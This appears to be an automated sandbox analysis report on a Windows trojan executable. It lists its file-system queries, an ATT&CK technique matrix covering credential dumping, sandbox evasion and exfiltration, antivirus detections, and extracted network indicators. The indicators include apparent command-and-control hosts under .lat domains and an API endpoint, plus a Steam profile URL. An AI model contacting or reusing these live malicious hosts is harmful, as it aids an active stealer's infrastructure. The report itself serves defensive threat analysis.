                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 0gnHF2twcT.exe PID: 1464, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: 0gnHF2twcT.exe PID: 1464, type: MEMORYSTR
                ATT&CK matrix, one line per tactic (where the report attaches a count to a technique, the count is given in front of the technique name):
                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
                Execution: 2 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Defense Evasion: 34 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
                Discovery: 1 Query Registry; 751 Security Software Discovery; 34 Virtualization/Sandbox Evasion; 2 Process Discovery; 21 File and Directory Discovery; 223 System Information Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
                Collection: 1 Archive Collected Data; 41 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
                Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

                Source | Detection | Scanner | Label | Link
                0gnHF2twcT.exe | 58% | ReversingLabs | Win32.Trojan.Generic | -
                0gnHF2twcT.exe | 54% | Virustotal | - | Browse
                0gnHF2twcT.exe | 100% | Avira | TR/Crypt.XPACK.Gen | -
                0gnHF2twcT.exe | 100% | Joe Sandbox ML | - | -
                No Antivirus matches
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                steamcommunity.com | 23.55.153.106 | true | false | - | high
                lev-tolstoi.com | 104.21.66.86 | true | false | - | high
                sustainskelet.lat | unknown | unknown | false | - | high
                crosshuaht.lat | unknown | unknown | false | - | high
                rapeflowwj.lat | unknown | unknown | false | - | high
                grannyejh.lat | unknown | unknown | false | - | high
                aspecteirs.lat | unknown | unknown | false | - | high
                sweepyribs.lat | unknown | unknown | false | - | high
                discokeyus.lat | unknown | unknown | false | - | high
                energyaffai.lat | unknown | unknown | false | - | high
                necklacebudi.lat | unknown | unknown | false | - | high
                Name | Malicious | Antivirus Detection | Reputation
                aspecteirs.lat | false | - | high
                sweepyribs.lat | false | - | high
                sustainskelet.lat | false | - | high
                rapeflowwj.lat | false | - | high
                https://steamcommunity.com/profiles/76561199724331900 | false | - | high
                energyaffai.lat | false | - | high
                https://lev-tolstoi.com/api | false | - | high
                grannyejh.lat | false | - | high
                necklacebudi.lat | false | - | high
                Name | Source | Malicious | Antivirus Detection | Reputation
                https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://duckduckgo.com/chrome_newtab | 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                https://player.vimeo.com | 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://www.google.com/recaptcVcc | 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://lev-tolstoi.com:443/apin.txtPK | 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
                https://duckduckgo.com/ac/?q= | 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                https://steamcommunity.com/profiles/7656119972433190066U | 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009D0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://steamcommunity.com/?subsection=broadcasts | 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://store.steampowered.com/subscriber_agreement/ | 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://www.gstatic.cn/recaptcha/ | 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://store.steampowered.comm | 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
                https://cdn.fastly. | 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
                https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE | 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                http://www.valvesoftware.com/legal.htm | 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en | 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://store.steampow | 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
                https://www.youtube.com | 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://necklacebudi.lat:443/apigl | 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
                https://www.google.com | 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://grannyejh.lat:443/api | 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ | 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl | 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis | 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://s.ytimg.com; | 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english& | 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                https://steambroadcast-test.akamaized | 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmp | false | -
                                                                                                                      unknown
                                                                                                                      https://store.steamp0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://community.fastly.steamstatic.com/0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://steam.tv/0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://store.ste0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://lev-tolstoi.com/apickc60gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://lev-tolstoi.com/0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://store.steampowered.com/privacy_agreement/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://steamcommunity.com:443/profiles/765611997243319000gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://store.steampowered.com/points/shop/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl00gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://ocsp.rootca1.amazontrust.com0:0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&a0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://sketchfab.com0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.ecosia.org/newtab/0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://lv.queniujq.cn0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://aspecteirs.lat:443/api0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://steamcommunity.com/profiles/76561199724331900/inventory/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.youtube.com/0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://crosshuaht.lat0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://store.steampowered.com/privacy_agreement/0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=eng0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://lev-tolstoi.com:443/apil0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&am0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.google.com/recaptcha/0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://checkout.steampowered.com/0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://store.steampowered.com/;0gnHF2twcT.exe, 00000000.00000003.1508244562.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://store.steampowered.com/about/0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://lev-tolstoi.com/apivZ0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://steamcommunity.com/my/wishlist/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://sweepyribs.lat:443/api%l0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
